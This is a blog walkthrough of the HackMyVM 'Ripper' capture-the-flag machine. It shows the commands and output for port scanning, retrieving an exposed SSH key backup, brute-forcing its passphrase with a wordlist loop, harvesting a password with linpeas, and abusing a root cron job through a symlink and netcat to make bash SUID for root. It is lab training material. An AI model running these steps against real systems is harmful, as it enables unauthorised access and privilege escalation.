Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Ripper Walkthrough

HackMyVm Ripper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ripper

Scan ports.

 nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION            
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan port 80.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]


Check staff_statements.txt. Old ssh connection files may mean id_rsa.bak.

 cat staff_statements.txt   
 The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.


Take care the screen of VM told us the user name jack.

image-20210603115519124.png


Download id_rsa.bak, try to connect ssh, it's encrypted.

 wget http://192.168.56.100/id_rsa.bak
 2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]
 
 ssh jack@192.168.56.100 -i id_rsa.bak
 Enter passphrase for key 'id_rsa.bak':


Use following code to brute force password.

 cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C “jack@192.168.56.100” -P $pass -f id_rsa.bak &>/dev/null; then echo $pass; break; fi; done
 bananas


Login as jack. After some enum, found nothing useful.

Download linpeas from github. Upload to VM.

 wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh


Run linpeas.sh, get a strange string.

 [+] Hashes inside passwd file? ........... No                                                                                        
 [+] Writable passwd file? ................ No
 [+] Credentials in fstab/mtab? ........... No
 [+] Can I read shadow files? ............. No
 [+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
 [+] Can I write in network-scripts? ...... No
 [+] Can I read root folder? .............. No


It's the password of another user helder.

Download pspy64 from github(https://github.com/DominicBreuker/pspy), upload to VM, check system process.

 2021/06/02 08:22:01 CMD: UID=0    PID=1205   | /usr/sbin/CRON -f 
 2021/06/02 08:22:01 CMD: UID=0    PID=1206   | /usr/sbin/CRON -f
 2021/06/02 08:22:01 CMD: UID=0    PID=1207   | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi
 


The bash code means, if /root/.local/helder.txt is equal to /home/helder/passwd.txt, then we can send a string (like XXX) to port 10000, and system will set SUID bit of /usr/bin/XXX.

So we make a symbolic link, and send port 10000 string "bash". After a minute, /usr/bin/bash has been set SUID.

 helder@ripper:~$ln -s /root/.local/helder.txt ./passwd.txt
 helder@ripper:~$echo bash |nc -nlvp 10000
 listening on [any] 10000 ...
 connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43374
 helder@ripper:~$ls -la /usr/bin/bash
 -rwsr-sr-x 1 root root 1168776 Apr 18  2019 /usr/bin/bash


Get root finally.

 helder@ripper:~$/usr/bin/bash -p
 helder@ripper:~$id
 uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0